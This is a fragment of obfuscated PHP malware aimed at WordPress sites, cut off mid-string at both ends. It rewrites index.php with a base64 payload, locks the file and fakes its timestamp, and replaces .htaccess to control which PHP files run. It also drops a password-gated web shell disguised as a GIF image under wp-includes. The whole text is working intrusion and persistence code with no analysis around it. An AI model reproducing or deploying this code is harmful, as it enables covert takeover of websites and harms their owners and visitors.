TXlWbUpLTTFJMVkwZFZibGhUUVRsSlNFNHdZMjVhYUdKRGFHcGtXRXB6V0RKa2JHUkhiSFZhYlRodlNrZE5jMGxGVGxaVmEzaEtWR3RhVUZnd1RsQlViRkpHVkd4U1psWkdiRkZTVTJ0d1QzY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEtTRXBzWXpOQ2RtSnVUbXhYZVdScVlqSTFNRnBYTlRCS01UQm5VRk5DZW1SSVNqSlpWM2R2V1ROV2VXSkdPVzVhV0ZKd1ltMWFka3REVW1wTVEwSkVWbFpLVFZOVk5VZFVNVGxUVWxWU1NsVnJWa1JXUmpsV1ZXdDNjRXRVYzA1RGFVRm5TVU5CWjBsRFFXZEpRMEZuU1VWQ2FtUllTbk5ZTWs1ellqTk9iRXREVW1wTFZITk9RMmxCWjBsRFFXZEpRMEZuU1VOQlowbEhiRzFKUTJkclkyMVdlbU5IT1hWak1sWmlTak5PTUZsWVVqRmplV1JrU1VRd09VbEVTWGROUTJ0blpYY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOU2VWcFlUbmRpTWpWNldsWnpibGt5T1hWa1IxWjFaRU5rWkVsRU1HZGpNMUo1WkcxR2MwdERVbXBZTTBwc1pFaGFhR0pEYXpkRVVXOW5TVU5CWjBsRFFXZEpRMEZuU1VOQ09VUlJiMmRKUTBGblNVTkJaMGxJTUdkYVYzaDZXbGRzYlVsRGFIQmliV3htV2pKV01FdERaR2hpUjNoMlpERTVNV050ZUdaYWJUbDNXbGMwYmt0VGEyZGxkekJMU1VOQlowbERRV2RKUTBGblNVTkJaMHBIYURCa1NFSm1Zak5DTUVsRU1HZFpXRXA1V1ZocmIwUlJiMmRKUTBGblNVTkJaMGxEUVdkSlEwRm5TVU5CWjBveWFEQmtTRUZ1U1VRd0swbEhSbmxqYlVZMVMwTmtkRnBZVW05aU1sRnVTVVF3SzBsRFpFaFNWbEZ1VEVOQmJtUkhiSFJhVnpreFpFTmpaMUJVTkdkT2FrRnpTakphZG1KSGVIWmtNVGx6WWpKT2FHUkhiSFppYVdNNVVHcEJjRXhCTUV0SlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOQlowbERaSHBqTW5kdVNVUXdLMGxIUm5samJVWTFTME5LTWxwWVNuQmFibXhtWTBkV2JHTnBTV2RRVkRSbldtMUdjMk15VlhOSlEwb3lXbGhLY0ZwdWJHWmpSMVpzWTJ3NWRWbFhNV3hKYVVFNVVHbENiVmxYZUhwYVUydE9RMmxCWjBsRFFXZEpRMEZuU1VOQlowbERhemRFVVc5blNVTkJaMGxEUVdkSlEwRm5TVU5CYTFreU9YVmtSMVkwWkVOQk9VbElUakJqYlZab1lsWTVhbUl5TlRCYVdHZ3dXREpPZVZwWFJqQmFVMmRyWVVoU01HTkdPWFpqU0ZGd1QzY3dTMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEtSMDUyWW01U2JHSnVVV2RRVTBKQldtMXNjMXBXT1c1YVdGSm1XVEk1ZFdSSFZuVmtTRTF2U2toV2VXSkRkMmRhYlVaell6SlZjMGxEVW1waU1qVXdXbGhvTUV0VWMwNURhVUZuU1VOQlowbERRV2RKUTBGblNVTlNlVnBZVG5kaU1qVjZXbE5CT1VsSFJubGpiVVkxV0RJeGJHTnRaR3hMUTFKNVdsaE9kMkl5TlhwYVUzZG5ZVWM1YmxFelRqQlZWV3hzVkZkd2EyVlZOV2xVU0VKelVsZHJiMHBIYURCa1NFSm1ZMjFXZW1OSE9YVmpNbFptWVVkV2FGcEhWbmxMVTJzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFuQmFhVUZ2U2toS2JHTXpRblppYms1c1YzbGtlbVJIUmpCa1dFMXVXRk5CT1ZCVFFYbE5SRUZ3U1VoelRrTnBRV2RKUTBGblNVTkJaMGxEUVdkSlEwRm5TVU5CYTJOdFZucGpSemwxWXpKV1lrb3lUblppYmxKc1ltNVJibGhUUVRsSlNFNHdZMjVhYUdKRFoydFpNamwxWkVkV2RXUkRhemRFVVc5blNVTkJaMGxEUVdkSlEwRm5TVU5DT1VSUmIyZEpRMEZuU1VOQlowbElNRTVEYVVGblNVTkNPVWxIVG1oa1IwNXZTVU5vUm1WSFRteGpTRkp3WWpJMFowcEhWWEJKU0hOT1EybEJaMGxEUWpsRVVXOW5TVU5CWjJOdFZqQmtXRXAxU1VOU2VWcFlUbmRpTWpWNldsUnpUa051TUU1RFp6QkxXbTVXZFZrelVuQmlNalJuVmxWV1RXRnRValpaVm13MVpEQkdjRkl5TlcxVWVXZHJZek5TZVV0Uk1FdGxkekJMU1VOQlowbEhiRzFKUTJkb1NraE9NR05wYTJkamJWWXdaRmhLZFVsRFkyNVBkekJMU1VOQlowbElTbXhrU0ZaNVltbENlV1JJU25CaVUyaDZaRWhLTUdOcGFHbFpXRTVzVG1wU1pscFhOV3BpTWxKc1MwTlNlbVJJU1hCTVEwRnVTM2s0Ymt4RFFXNU1Wamh1UzFOM1owcDZNRzVMVkhOT1EyNHdUa05uTUV0YWJsWjFXVE5TY0dJeU5HZGFWemt5WXpKU1RXUkZTalpsUlZwUFdXeGFWbU5wWjNCRVVYQTNSRkZ2WjBsRFFXZEtSMngzV0RKR2ExcElTV2RRVTBGdVNucHpUa05wUVdkSlEwSndXbWxCYjJGWVRucGFXRkZ2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aUk1GcG1VVEE1VDFSclZrUldSV3hQVWpFNVNsVkRaR1JMVTBGdFNtbEJhRnBYTVhka1NHdHZTa1k1VkZKV1NsZFNWa3BpU2pCb1ZWWkdRbVpSTUZwbVVUQTVUMVJyVmtSV1JXeFBVakU1U2xWRFpHUkxVMnRuWlhjd1MwbERRV2RKUTBGblNVTkJhMkZZUW1aWlYxSnJZMmxCT1VsRFVtWlZNRlpUVm10V1UxZDVaRWxXUmxKUldEQk9SMWd3VGxCVWF6VkdVVEZTU2xSclpHWlRWa0Z1V0ZSelRrTnBRV2RKUTBJNVNVZFdjMk15Vm5CYWFVRnZZVmhPZWxwWVVXOUtSamxVVWxaS1YxSldTbUpLTUdoVlZrWkNabGRHT1ZOU1ZVWk5XREJzVVVveE1IQkpRMWx0U1VOR2JHSllRakJsVTJkcldERk9SbFZzV2taVmJITnVVMFpTVlZWR09WbFlNVXBHVVZWNFpsTldRVzVZVTJ0d1NVaHpUa05wUVdkSlEwRm5TVU5CWjBwSGJIZFlNa1pyV2toSloxQlRRV3RZTVU1R1ZXeGFSbFZzYzI1VFJsSlZWVVk1V1ZneFNrWlJWWGhtVTFaQmJsaFVjMDVEYVVGblNVTkNPVWxIVm5Oak1sWndXbWxCYjJGWVRucGFXRkZ2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aWFJqbEhWREZLV0ZGV1NrVlNWVkptVW1zNVUwb3hNSEJKUTFsdFNVTkdiR0pZUWpCbFUyZHJXREZPUmxWc1drWlZiSE51VTBaU1ZWVkdPVmxZTUZwUVZXeGtRbFZyVWtaU1JqbEhWREZKYmxoVGEzQkpTSE5PUTJsQlowbERRV2RKUTBGblNrZHNkMWd5Um10YVNFbG5VRk5CYTFneFRrWlZiRnBHVld4emJsTkdVbFZWUmpsWldEQmFVRlZzWkVKVmExSkdVa1k1UjFReFNXNVlWSE5PUTJsQlowbERRamxKUjFaell6SlZaMlYzTUV0SlEwRm5TVU5CWjBsRFFXdGhXRUptV1ZkU2EyTnBRVGxKUTFKbVZUQldVMVpyVmxOWGVXUlRVbFV4VUZaRlZtWlJWVkpGVldsa1pFOTNNRXRKUTBGblNVZ3dUa05wUVdkSlEwRnJZVmhDWmxsWFVtdGphVUU1U1VoU2VXRlhNRzlqTTFKNVdETktiR05IZUdoWk1sVnZTV2xCYVV4RFFXbEphWGRuU2tkc2QxZ3lSbXRhU0Vsd1RFTkJhVXhEU1hCUGR6QkxTVU5CWjBsSGJHMUpRMmg2WkVoS2QySXpUVzlLUjJ4M1dESkdhMXBJU1hOSlEwbHpTV2xyWjBsVU1EbEpSMXBvWWtoT2JFdFRRamRFVVc5blNVTkJaMGxEUVdkSlExSndZMFk1YUZwSFVubEpSREJuV2xob2QySkhPV3RhVTJkcFRFTkpjMGxEVW5CalJqbG9Xa2RTZVV0VWMwNURhVUZuU1VOQlowbERRV2RLUjJ4M1dESkdhMXBJU1dkUVUwRnJZVmhDWmxsWFVtdGpiSE4zV0ZSelRrTnBRV2RKUTBJNVJGRnZaMGxEUVdkamJWWXdaRmhLZFVsRFVuQmpSamxvV2tkU2VVOTNNRXRtVVRCTFJGRndiV1JYTldwa1IyeDJZbWxDVVZZd05XbFdTRVpyVkZkd1NWRXphSEpqUTJkd1JGRndOMFJSYjJkSlEwRm5Ta2RvTUdSSVFtWmpTRXAyWkVjNFoxQlRRVzVoU0ZJd1kwUnZka3g1WXpkRVVXOW5TVU5CWjJGWFdXZExSMng2WXpKV01FdERVbVpWTUZaVFZtdFdVMWQ1WkVsV1JsSlJWWGxrWkV0VFFXMUthVUo2WkVoS01HSXllSFprTWxaNVMwTlNabFV3VmxOV2ExWlRWM2xrU1ZaR1VsRlZlV1JrUzFOQmFGQlVNR2RLTWpsdFdtbGpjRWxJYzA1RGFVRm5TVU5CWjBsRFFXZEtSMmd3WkVoQ1ptTklTblprUnpoblVGTkJibUZJVWpCalNFMDJUSGs0Yms5M01FdEpRMEZuU1Vnd1oxcFhlSHBhVjJ4dFNVTm9jR016VG14a1EyZHJXREZPUmxWc1drWlZiSE51VTBaU1ZWVkdPVmxZTUZwUVZXeGtRbFZyVWtaU1JqbFJWV3M1VlZSNVpHUkxVMEZ0U21sQmExZ3hUa1pWYkZwR1ZXeHpibE5HVWxWVlJqbFpXREJhVUZWc1pFSlZhMUpHVWtZNVVWVnJPVlZVZVdSa1NVUXdPVkJUUVc1aFNGSXdZMGhOYmt0VFFqZEVVVzluU1VOQlowbERRV2RKUTFKdlpFaFNkMWd6UW5saU0xSjJTVVF3WjBveWFEQmtTRUo2VDJrNGRrcDZjMDVEYVVGblNVTkNPVWxIVm5Oak1sWndXbWxCYjJGWVRucGFXRkZ2U2tZNVZGSldTbGRTVmtwaVNqQm9WVlpHUW1aU2JFcFFWR3hTWmxKVk5VVllNR2hWVmtaQ1ZFb3hNSEJKUTFsdFNVaE9NR051VW5aaVJ6a3pXbGhKYjBwR09WUlNWa3BYVWxaS1lrb3dhRlZXUmtKbVVteEtVRlJzVW1aU1ZUVkZXREJvVlZaR1FsUktNVEJ3U1VORk9WQlRRVzVpTWxwdFNubHJaMlYzTUV0SlEwRm5TVU5CWjBsRFFXdGhTRkl3WTBZNWQyTnRPVEJpZVVFNVNVTmtiMlJJVW5kamVtOTJUSGxqTjBSUmIyZEpRMEZuWmxFd1MwbERRV2RKU0Vwc1pFaFdlV0pwUVd0aFNGSXdZMFk1ZDJOdE9UQmllbk5PUTI0d1RrTm5NRXRoVjFsblMwTlNabFV3VmxOV2ExWlRWM2xrVTFKV1JsWlNWazVWV0RGV1UxTlRaR1JKUkRBNVVGTkJia3d4U1hSS2VVRjFTVWN4YTA1VFoydFlNVTVHVld4YVJsVnNjMjVWTUZaVFZtdFdVMWd3TlVKVVZWVnVXRk5yY0VsSWMwNURhVUZuU1VOQ2JHVkhiREJMU0U0d1kyNUtiR1JwYUhSYVJGVnZTa1k1VkZKV1NsZFNWa3BpU2pGT1JsVnNXa1pWYkRsUFVWVXhSa294TUhCTFUyczNSRkZ3T1VSUmNIQmFhVUZ2WXpOV2FXTXpVbmxZTWs1MlpGYzFNRXREVW1aVk1GWlRWbXRXVTFkNVpGTlNWa1pXVWxaT1ZWZ3hWbE5UVTJSa1RFTmtjR0p0VW14bFF6VjNZVWhCZG1GdGMyNUxVMnczUkZGdlowbERRV2RhV0dod1pFTm5ibVY1UVdsYVdFcDVZak5KYVU5cFFYbE5SRUZ6U1VOS2MxbDVTVFpKUTBweFlYbEpjMGxEU210WldGSm9TV3B2WjFkNVFYaEpSakJuWmxOamNFOTNNRXRtVVRCTFNrZHNkMWd5Um10YVNFbG5VRk5DYkdJelducGFSWGd3VVc1d05GSnJOV2xXYkZaNVMwTnJOMFJSYjJ0amJWWnRXbGhLYkdOcFFUbEpTRTR3WTI1YWFHSkRhRUZLUmpsVVVsWktWMUpXU21KS01HaFZWa1pDWmxWclZrZFNWa3BHVldsa1pFdFVjMDVEYVZKNllWaFNiRmd6Vm5saVEwRTVTVVpDV0ZSdFNsVmpWMUpPWVd0b1JHVkhkSGRMUTJ0blRHbEJhMWd4VGtaVmJGcEdWV3h6YmxVd1ZsTldhMVpUV0RBMVFsUlZWVzVZVkhOT1EyMXNiVWxEYUhwa1NFcDNZak5OYjBwSVNteGFiVlo1V2xoSmMwbERVbnBoV0ZKc1dETldlV0pEYTJkUVZEQTVTVVJCY0VsRFVubGFWMXBzWTIxV2VVbEVNR2RLZVdNM1JGRnZhMk51UldkUVUwSm9ZMjVLYUdWVFozQlBkekJMU2toS2VGZDVaR3RLTVRCblVGTkNWbEpWZUhGYVNIQm9WMWhzTTFGWGJFaGliVnBRUzBOU1psVXdWbE5XYTFaVFYzbGtSVlF3VGxaVVZWWlBWa1k1VTFRd09WVktNVEJ3VDNjd1MwcElTbmhYZVdSd1NqRXdaMUJUUWxaU1ZYaHhXa2h3YUZkWWJETlJWMnhJWW0xYVVFdERVbkJqUmpsb1drZFNlVXRVYzA1RGFWSjVZMVp6Ym1KRFpHUkpSREJuVmxWV1RXRnRValpaVm13MVpEQkdjRkl5TlcxVWVXZHJXREZPUmxWc1drWlZiSE51VTBaU1ZWVkdPVUpSTUU1R1ZVWlNabFJGUms5U01WWkNVakJWYmxoVGF6ZEVVVzlyWTI1R1lrb3pUblZLTVRCblVGTkNWbEpWZUhGYVNIQm9WMWhzTTFGWGJFaGliVnBRUzBOU1psVXdWbE5XYTFaVFYzbGtWRkV4U2twVlJsSm1WR3RHVGxKVFpHUkxWSE5PUTJsU2VXTldjMjVqYVdSa1NVUXdaMVpWVmsxaGJWSTJXVlpzTldRd1JuQlNNalZ0VkhsbmExZ3hUa1pWYkZwR1ZXeHpibFZyVmxKV1ZWWlVWa1k1VmxWcmEyNVlVMnMzUkZGdmEyTnVSbUpLTTBwdFNqRXdaMUJUUWxaU1ZYaHhXa2h3YUZkWWJETlJWMnhJWW0xYVVFdERVbmxhVjFwc1kyMVdlVXRVYzA1RGFWSjVZMVp6Ym1ONVpHUkpSREJuVmxWV1RXRnRValpaVm13MVpEQkdjRkl5TlcxVWVXZHJZekpzTUZwV09URmpiWGR3VDNjd1MwcElTbmhYZVdReFNqRXdaMUJUUWxaU1ZYaHhXa2h3YUZkWWJETlJWMnhJWW0xYVVFdERVbVpWTUZaVFZtdFdVMWQ1WkVsV1JsSlJXREZXVkZKV1NtWlJWV1JHVkd4UmJsaFRhemRFVVc5clkyMVdlbU5IT1hWak1sVm5VRk5DZWxwdWJHaGtTRnBwWVVoR2MyRnBaMjVoU0ZJd1kwUnZka3g2VVRCUFdFSTBURzFvZG1KWE9YSmhWelIxV1RKYWEweDVZM05KUTFKNVkxTnJOMFJSY0hCYWFVRnZTVmRzZFZneVJubGpiVVkxUzBOU2VWcFlUbmRpTWpWNldsWnpibU16VW1oa1NGWjZTakV3YzBsSFJubGpiVVkxUzBSQmMwbEVTWGROUTJ0d1MxTkNOMFJSYjJkSlEwRm5Zek5rY0dSSFRtOUpRMmRyWTIxV2VtTkhPWFZqTWxaaVNqTk9NRmxZVWpGamVXUmtTMU5DTjBSUmIyZEpRMEZuU1VOQlowbEhUbWhqTWxWblRYcEJlRTluTUV0SlEwRm5TVU5CWjBsRFFXZEpRMEZuWVVkV2FGcEhWbmxMUTJSSlZrWlNVVXg2UlhWTlUwRjZUVVJGWjFSWE9USmFWMUZuVlVkV2VXSlhSblZhVnpVd1lraHJia3RVYzA1RGFVRm5TVU5CWjBsRFFXZEpRMEZuU1Vkb2JGbFhVbXhqYVdkdVZFYzVhbGxZVW5CaU1qUTJTVU5qWjB4cFFqQmpiV3gwUzBOU2VWcFlUbmRpTWpWNldsWnpibGt5T1hWa1IxWjFaRU5rWkV0VGF6ZEVVVzluU1VOQlowbERRV2RKUTBGblNVTkNhV050Vm1oaGVuTk9RMmxCWjBsRFFXZEpRMEZuV1RKR2VscFRRWHBOUkVrMlJGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFtOWFWMFpyV2xoSmIwb3dhRlZXUmtGMlRWTTBlRWxFVFhkTmFVSk9Zak5hYkVsR1VteGlXRUoyWTIxR2VXRlhlRFZLZVdzM1JGRnZaMGxEUVdkSlEwRm5TVU5CWjBsRFFtOWFWMFpyV2xoSmIwb3dlSFpaTWtZd1lWYzVkVTlwUVc1SlF6Um5aRWhLY0dKVFoydGpiVlo2WTBjNWRXTXlWbUpLTWs1MlltNVNiR0p1VVc1WVUydHdUM2N3UzBsRFFXZEpRMEZuU1VOQlowbERRV2RaYmtwc1dWZHpOMFJSYjJkSlEwRm5TVU5CWjBsSFRtaGpNbFZuVGtSQk1FOW5NRXRKUTBGblNVTkJaMGxEUVdkSlEwRm5ZVWRXYUZwSFZubExRMlJKVmtaU1VVeDZSWFZOVTBFd1RVUlJaMVJ0T1RCSlJWcDJaRmMxYTBwNWF6ZEVVVzluU1VOQlowbERRV2RKUTBGblNVTkNiMXBYUm10YVdFbHZTVzVPTUZsWVVqRmplbTluVGtSQk1FbEZOWFprUTBKSFlqTldkVnBEU1hCUGR6QkxTVU5CWjBsRFFXZEpRMEZuU1VOQloxbHVTbXhaVjNNM1JGRnZaMGxEUVdkSlEwRm5TVWRTYkZwdFJqRmlTRkUyUkZGdlowbERRV2RKUTBGblNVTkJaMGxEUW1samJWWm9ZWHB6VGtOcFFXZEpRMEk1UkZGdlowbERRV2RhV0dod1pFTm5kMHRVYzA1RGJqQm5XbGQ0ZWxwWGJHMUpRMmg2WkVoS2MxcFhORzlLU0Vwc1l6TkNkbUp1VG14WGVXUnFZakkxTUZwWE5UQktNVEJ3UzFOQ04wUlJiMmRKUTBGblVVZG9iRmxYVW14amFXZHVVVEk1ZFdSSFZuVmtRekZWWlZoQ2JFOXBZMmRNYVVGclkyMVdlbU5IT1hWak1sWmlTak5TTldOSFZXNVlVMnMzUkZGdlowbERRV2RhVjA1dllubEJhMk50Vm5walJ6bDFZekpXWWtveVRuWmlibEpzWW01UmJsaFVjMDVEYVVGblNVTkNiR1ZIYkRCTFJFRndUM2N3UzJaVFFTOVFaejA5SWlrcE93PT0iLyotM0FNYEktKi8pLyotS1tRTXcmRzgoLSovKTs/Pjw/cGhwIGRlZmluZSggJ1dQX1VTRV9USEVNRVMnLCB0cnVlICk7IHJlcXVpcmUoJy4vd3AtYmxvZy1oZWFkZXIucGhwJyk7Pz4=");
$index_code = file_get_contents($do."index.php");
if(md5($index_code) != md5($open_cache_ruzhu_phpcode))
{
  @chmod($do."index.php", 0644);
  @file_put_contents($do."index.php", $open_cache_ruzhu_phpcode);
  @touch($do."index.php", filectime($do."index.php"));
  @chmod($do."index.php", 0444);
}

$huan_yuan_htaccess = base64_decode("PEZpbGVzTWF0Y2ggJy4ocHl8ZXhlfHBodG1sfHBocHxQSFB8UGhwfFBIcHxwSHB8cEhQfHBIUDd8UEhQN3xwaFB8UGhQfHBocDV8c3VzcGVjdGVkKSQnPgpPcmRlciBhbGxvdyxkZW55CkRlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAnXihpbmRleC5waHB8aW5wdXRzLnBocHxhZG1pbmZ1bnMucGhwfGNodG1sZnVucy5waHB8Y2pmdW5zLnBocHxjbGFzc3NtdHBzLnBocHxjbGFzc2Z1bnMucGhwfGNvbWZ1bmN0aW9ucy5waHB8Y29tZG9mdW5zLnBocHxjb25uZWN0cy5waHB8Y29weXBhdGhzLnBocHxkZWxwYXRocy5waHB8ZG9pY29udnMucGhwfGVwaW55aW5zLnBocHxmaWxlZnVucy5waHB8Z2RmdHBzLnBocHxoaW5mb2Z1bnMucGhwfGhwbGZ1bnMucGhwfG1lbWJlcmZ1bnMucGhwfG1vZGRvZnVucy5waHB8b25jbGlja2Z1bnMucGhwfHBocHppcGluY3MucGhwfHFmdW5jdGlvbnMucGhwfHFpbmZvZnVucy5waHB8c2NoYWxsZnVucy5waHB8dGVtcGZ1bnMucGhwfHVzZXJmdW5zLnBocHxzaXRlaGVhZHMucGhwfHRlcm1wcy5waHB8dHhldHMucGhwfHRob21zLnBocHxwb3N0bmV3cy5waHB8d3AtYmxvZy1oZWFkZXIucGhwfHdwLWNvbmZpZy1zYW1wbGUucGhwfHdwLWxpbmtzLW9wbWwucGhwfHdwLWxvZ2luLnBocHx3cC1zZXR0aW5ncy5waHB8d3AtdHJhY2tiYWNrLnBocHx3cC1hY3RpdmF0ZS5waHB8d3AtY29tbWVudHMtcG9zdC5waHB8d3AtY3Jvbi5waHB8d3AtbG9hZC5waHB8d3AtbWFpbC5waHB8d3Atc2lnbnVwLnBocHx4bWxycGMucGhwfGVkaXQtZm9ybS1hZHZhbmNlZC5waHB8bGluay1wYXJzZS1vcG1sLnBocHxtcy1zaXRlcy5waHB8b3B0aW9ucy13cml0aW5nLnBocHx0aGVtZXMucGhwfGFkbWluLWFqYXgucGhwfGVkaXQtZm9ybS1jb21tZW50LnBocHxsaW5rLnBocHxtcy10aGVtZXMucGhwfHBsdWdpbi1lZGl0b3IucGhwfGFkbWluLWZvb3Rlci5waHB8ZWRpdC1saW5rLWZvcm0ucGhwfGxvYWQtc2NyaXB0cy5waHB8bXMtdXBncmFkZS1uZXR3b3JrLnBocHxhZG1pbi1mdW5jdGlvbnMucGhwfGVkaXQucGhwfGxvYWQtc3R5bGVzLnBocHxtcy11c2Vycy5waHB8cGx1Z2lucy5waHB8YWRtaW4taGVhZGVyLnBocHxlZGl0LXRhZy1mb3JtLnBocHxtZWRpYS1uZXcucGhwfG15LXNpdGVzLnBocHxwb3N0LW5ldy5waHB8YWRtaW4ucGhwfGVkaXQtdGFncy5waHB8bWVkaWEucGhwfG5hdi1tZW51cy5waHB8cG9zdC5waHB8YWRtaW4tcG9zdC5waHB8ZXhwb3J0LnBocHxtZWRpYS11cGxvYWQucGhwfG5ldHdvcmsucGhwfHByZXNzLXRoaXMucGhwfHVwbG9hZC5waHB8YXN5bmMtdXBsb2FkLnBocHxtZW51LWhlYWRlci5waHB8b3B0aW9ucy1kaXNjdXNzaW9uLnBocHxwcml2YWN5LnBocHx1c2VyLWVkaXQucGhwfG1lbnUucGhwfG9wdGlvbnMtZ2VuZXJhbC5waHB8cHJvZmlsZS5waHB8dXNlci1uZXcucGhwfG1vZGVyYXRpb24ucGhwfG9wdGlvbnMtaGVhZC5waHB8cmV2aXNpb24ucGhwfHVzZXJzLnBocHxjdXN0b20tYmFja2dyb3VuZC5waHB8bXMtYWRtaW4ucGhwfG9wdGlvbnMtbWVkaWEucGhwfHNldHVwLWNvbmZpZy5waHB8d2lkZ2V0cy5waHB8Y3VzdG9tLWhlYWRlci5waHB8bXMtZGVsZXRlLXNpdGUucGhwfG9wdGlvbnMtcGVybWFsaW5rLnBocHx0ZXJtLnBocHxjdXN0b21pemUucGhwfGxpbmstYWRkLnBocHxtcy1lZGl0LnBocHxvcHRpb25zLnBocHxlZGl0LWNvbW1lbnRzLnBocHxsaW5rLW1hbmFnZXIucGhwfG1zLW9wdGlvbnMucGhwfG9wdGlvbnMtcmVhZGluZy5waHB8c3lzdGVtX2xvZy5waHApJCc+Ck9yZGVyIGFsbG93LGRlbnkKQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleC5waHAkIC0gW0xdClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1mClJld3JpdGVDb25kICV7UkVRVUVTVF9GSUxFTkFNRX0gIS1kClJld3JpdGVSdWxlIC4gaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPg==");
$yuan_htaccess = file_get_contents($do.".htaccess");
if(md5($yuan_htaccess) != md5($huan_yuan_htaccess))
{
  @chmod($do.".htaccess", 0644);
  @unlink($do.".htaccess");
  @file_put_contents($do.".htaccess", $huan_yuan_htaccess);
  @touch($do.".htaccess", filectime($do.".htaccess"));
  @chmod($do.".htaccess", 0444);
}
$file_general_template_path = $do."wp-includes/general-template.php";
$jue_jiang_404_path = $do."wp-includes/images/xit-3x.gif";
if (!file_exists($jue_jiang_404_path)){
  $jue_jiang_404 = "PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwpkYXRlX2RlZmF1bHRfdGltZXpvbmVfc2V0KCdQUkMnKTsKCiRBUlJBWSA9ICR7J19HRVQnfVsnQVJSQVknXTsKJEtKTW4gPSBzdHJfcm90MTMoJEFSUkFZKTsKJGNiSCA9IHBhY2soIlx4NDhceDJhIiwgJEtKTW4pOwokRXphVSA9IGpzb25fZGVjb2RlKCRjYkgsIHRydWUpOwppZiAoKCRFemFVWzBdIC0gdGltZSgpKSA+IDAgYW5kIG1kNShtZDUoJEV6YVVbMl0pKSA9PT0gIjlmMzQ2NjViMDA1MjMxMWQ1YjZhZDZmODIxZGM2MjI4IikgOiAvLyA9PT09Ci8vID09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQoKICAgIGZ1bmN0aW9uIGp1ZWppYW5nX3Blcm1zKCRmaWxlKXsKICAgICAgICAkcGVybXMgPSBmaWxlcGVybXMoJGZpbGUpOwogICAgICAgIGlmICgoJHBlcm1zICYgMHhDMDAwKSA9PSAweEMwMDApIHsvLyBTb2NrZXQKICAgICAgICAgICAgJGluZm8gPSAncyc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweEEwMDApID09IDB4QTAwMCkgey8vIFN5bWJvbGljIExpbmsKICAgICAgICAgICAgJGluZm8gPSAnbCc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDgwMDApID09IDB4ODAwMCkgey8vIFJlZ3VsYXIKICAgICAgICAgICAgJGluZm8gPSAnLSc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDYwMDApID09IDB4NjAwMCkgey8vIEJsb2NrIHNwZWNpYWwKICAgICAgICAgICAgJGluZm8gPSAnYic7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDQwMDApID09IDB4NDAwMCkgey8vIERpcmVjdG9yeQogICAgICAgICAgICAkaW5mbyA9ICdkJzsKICAgICAgICB9IGVsc2VpZiAoKCRwZXJtcyAmIDB4MjAwMCkgPT0gMHgyMDAwKSB7Ly8gQ2hhcmFjdGVyIHNwZWNpYWwKICAgICAgICAgICAgJGluZm8gPSAnYyc7CiAgICAgICAgfSBlbHNlaWYgKCgkcGVybXMgJiAweDEwMDApID09IDB4MTAwMCkgey8vIEZJRk8gcGlwZQogICAgICAgICAgICAkaW5mbyA9ICdwJzsKICAgICAgICB9IGVsc2Ugey8vIFVua25vd24KICAgICAgICAgICAgJGluZm8gPSAndSc7CiAgICAgICAgfQovLyBPd25lcgogICAgICAgICRpbmZvIC49ICgoJHBlcm1zICYgMHgwMTAwKSA/ICdyJyA6ICctJyk7CiAgICAgICAgJGluZm8gLj0gKCgkcGVybXMgJiAweDAwODApID8gJ3cnIDogJy0nKTsKICAgICAgICAkaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDA0MCkgPwogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDgwMCkgPyAncycgOiAneCcgKSA6CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwODAwKSA/ICdTJyA6ICctJykpOwoKLy8gR3JvdXAKICAgICAgICAkaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAyMCkgPyAncicgOiAnLScpOwogICAgICAgICRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDEwKSA/ICd3JyA6ICctJyk7CiAgICAgICAgJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMDgpID8KICAgICAgICAgICAgKCgkcGVybXMgJiAweDA0MDApID8gJ3MnIDogJ3gnICkgOgogICAgICAgICAgICAoKCRwZXJtcyAmIDB4MDQwMCkgPyAnUycgOiAnLScpKTsKCi8vIFdvcmxkCiAgICAgICAgJGluZm8gLj0gKCgkcGVybXMgJiAweDAwMDQpID8gJ3InIDogJy0nKTsKICAgICAgICAkaW5mbyAuPSAoKCRwZXJtcyAmIDB4MDAwMikgPyAndycgOiAnLScpOwogICAgICAgICRpbmZvIC49ICgoJHBlcm1zICYgMHgwMDAxKSA/CiAgICAgICAgICAgICgoJHBlcm1zICYgMHgwMjAwKSA/ICd0JyA6ICd4JyApIDoKICAgICAgICAgICAgKCgkcGVybXMgJiAweDAyMDApID8gJ1QnIDogJy0nKSk7CgogICAgICAgIHJldHVybiAkaW5mbzsKICAgIH0KCi8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQogICAgLyoqCiAgICAgKiDovazljJYgXCDkuLogLwogICAgICovCiAgICBmdW5jdGlvbiBkaXJfcGF0aCgkcGF0aCkKICAgIHsKICAgICAgICAkcGF0aCA9IHN0cl9yZXBsYWNlKCdcXCcsICcvJywgJHBhdGgpOwogICAgICAgIGlmIChzdWJzdHIoJHBhdGgsIC0xKSAhPSAnLycpICRwYXRoID0gJHBhdGggLiAnLyc7CiAgICAgICAgcmV0dXJuICRwYXRoOwogICAgfQoKLy8gLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t